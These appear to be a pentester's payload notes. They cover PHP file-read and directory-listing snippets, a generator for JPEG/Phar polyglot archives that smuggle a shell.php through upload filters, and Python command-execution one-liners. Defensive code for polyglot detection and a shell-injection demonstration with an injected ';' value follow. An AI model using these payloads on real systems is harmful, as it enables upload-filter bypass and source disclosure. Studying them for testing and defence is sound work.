Exploitation Payloads

PayloadsAllTheThings is the way to go, but I noted down some of mine.


PHP

PHP Info POC

phpinfo() is the usual first probe: it dumps the PHP version, loaded extensions and configuration in one page.

<?php phpinfo(); ?>

Read a file

There are multiple functions you can use (each line is an alternative; keep the one you need):

<?php
$fileContents = file_get_contents('index.php');     // returns the raw file contents
$fileContents = show_source('index.php', true);     // returns syntax-highlighted HTML instead of printing it
$fileContents = highlight_file('index.php', true);  // alias of show_source()
$fileContents = readfile('index.php');              // prints the file directly and returns the byte count, not the contents
echo $fileContents;
?>

Base64-encoding the result is not always necessary, especially with show_source(), but it keeps binary or HTML-looking output intact:

$fileContents = base64_encode($fileContents);

Execute Shell Commands

Refer to webshells#php.


List files in directory

A few different ways to achieve the same output:

<?php
// 1. Dump the whole listing in one go
var_dump(scandir("."));

// 2. Iterate over the array scandir() returns
$files = scandir(".");
foreach ($files as $file) {
    echo $file, "\n";
}

// 3. Object-style Directory handle
$dir = dir('.');
while (($f = $dir->read()) !== false) {   // strict check so an entry named "0" does not end the loop
    echo $f, "\n";
}
$dir->close();

// 4. Procedural opendir()/readdir()
$dir = opendir(".");
while (($f = readdir($dir)) !== false) {
    echo $f, "\n";
}
closedir($dir);

Phar

File upload polyglot

Simply zipping the PHP file may work. Otherwise, generate a Phar archive:

<?php // Run 'php --define phar.readonly=0 gen.php'
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
// or: $phar->addFile('shell.php', 'shell.php');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

➡️ shell.php is the file inside the archive.

To create a polyglot Phar (e.g. one that also passes as a JPEG, by starting with the \xff\xd8 start-of-image and \xff\xd9 end-of-image markers):

<?php // php --define phar.readonly=0 gen.php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.php', '<?php /*code*/ ?>');
$phar->setStub("\xff\xd8\xff\xd9\n<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();

📚 For reference: include 'phar://./shell.phar/shell.php';
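A defender-side check for the polyglot described above, added here as an example that is not part of the original notes. PHP finds a Phar's stub by the `__HALT_COMPILER();` token, not by the extension or the leading bytes, so an upload filter that only checks the JPEG magic number passes the polyglot. The script flags a file that carries the JPEG start-of-image marker and the Phar stub terminator at the same time. The sample byte strings are constructed, following the stub layout shown above, and the function names are my own.

```python
# Constructed sample inputs (not real files from any project); the POLYGLOT
# layout mirrors the JPG/Phar stub shown in the notes above.
JPEG_SOI = b"\xff\xd8"                 # JPEG start-of-image marker
JPEG_EOI = b"\xff\xd9"                 # JPEG end-of-image marker
PHAR_STUB_END = b"__HALT_COMPILER();"  # token PHP looks for to locate the end of a Phar stub

BENIGN_JPEG = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + JPEG_EOI
POLYGLOT = JPEG_SOI + JPEG_EOI + b"\n<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 64
PLAIN_PHP = b"<?php echo 'hello'; ?>"


def looks_like_jpeg(data: bytes) -> bool:
    """The check many upload filters stop at: does the file start with the JPEG magic?"""
    return data.startswith(JPEG_SOI)


def has_phar_stub(data: bytes) -> bool:
    """Search the whole file for the stub terminator; PHP does not care what precedes it."""
    return PHAR_STUB_END in data


def contains_php_tag(data: bytes) -> bool:
    """Catch plain PHP source disguised by a renamed extension."""
    return b"<?php" in data or b"<?=" in data


def classify_upload(data: bytes) -> str:
    """Decide whether an 'image' upload is safe to keep on a PHP host (illustrative rules)."""
    if looks_like_jpeg(data) and has_phar_stub(data):
        return "reject: image/phar polyglot"
    if has_phar_stub(data):
        return "reject: phar archive"
    if contains_php_tag(data):
        return "reject: embedded php"
    if looks_like_jpeg(data):
        return "accept: jpeg"
    return "reject: unknown type"


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_JPEG), ("polyglot", POLYGLOT), ("php", PLAIN_PHP)):
        print(f"{name:9s} {classify_upload(sample)}")
```

Treat the rules as illustrative: the point is the marker search, which is the part a magic-number check misses. If an application never needs Phar archives, `stream_wrapper_unregister('phar')` at bootstrap removes the `phar://` wrapper that the include line above relies on, and re-encoding uploaded images through an image library produces a fresh file without any appended stub or manifest.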


Python

Simple Python one-liners to run a command:

import os; os.system('ls -1a')                      # output goes straight to stdout
import os; print(os.popen('ls -1a').read())         # read() returns the output, so print it
import subprocess; subprocess.run(['ls', '-1a'])    # argument list, no shell involved
import subprocess; print(subprocess.run('whoami', shell=True, stdout=subprocess.PIPE, text=True).stdout)
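The fourth one-liner hands a string to /bin/sh, which matters as soon as any part of that string comes from outside the script. The following added example (not from the original notes) shows the difference with a harmless `echo`: the argument-list form treats a constructed value containing `;` as one literal argument, `shell=True` lets the shell split it into two commands, and `shlex.quote()` makes the shell form safe again. The variable and function names are mine.

```python
import shlex
import subprocess

# Constructed untrusted value, standing in for e.g. a filename taken from a request.
UNTRUSTED = "report.txt; echo INJECTED"


def run_with_list(arg: str) -> str:
    """Argument-list form: no shell is involved, so ';' is just part of argv[1]."""
    result = subprocess.run(["echo", arg], capture_output=True, text=True, check=True)
    return result.stdout.strip()


def run_with_shell(arg: str) -> str:
    """shell=True: the whole string goes to /bin/sh, which parses ';' as a command separator."""
    result = subprocess.run(f"echo {arg}", shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def run_with_shell_quoted(arg: str) -> str:
    """shell=True with shlex.quote(): the value is single-quoted, so the shell passes it through intact."""
    result = subprocess.run(f"echo {shlex.quote(arg)}", shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def commands_executed(output: str) -> int:
    """Each echo produces one line, so the line count tells how many commands actually ran."""
    return len(output.splitlines())


if __name__ == "__main__":
    for name, fn in (("list", run_with_list), ("shell", run_with_shell), ("shell+quote", run_with_shell_quoted)):
        out = fn(UNTRUSTED)
        print(f"{name:12s} -> {out!r} ({commands_executed(out)} command(s))")
```

When you need a shell feature (pipes, globbing), quote every externally supplied piece with `shlex.quote()`; otherwise prefer the list form, which is also what makes `subprocess.run(['ls', '-1a'])` above safe to extend with user-controlled arguments.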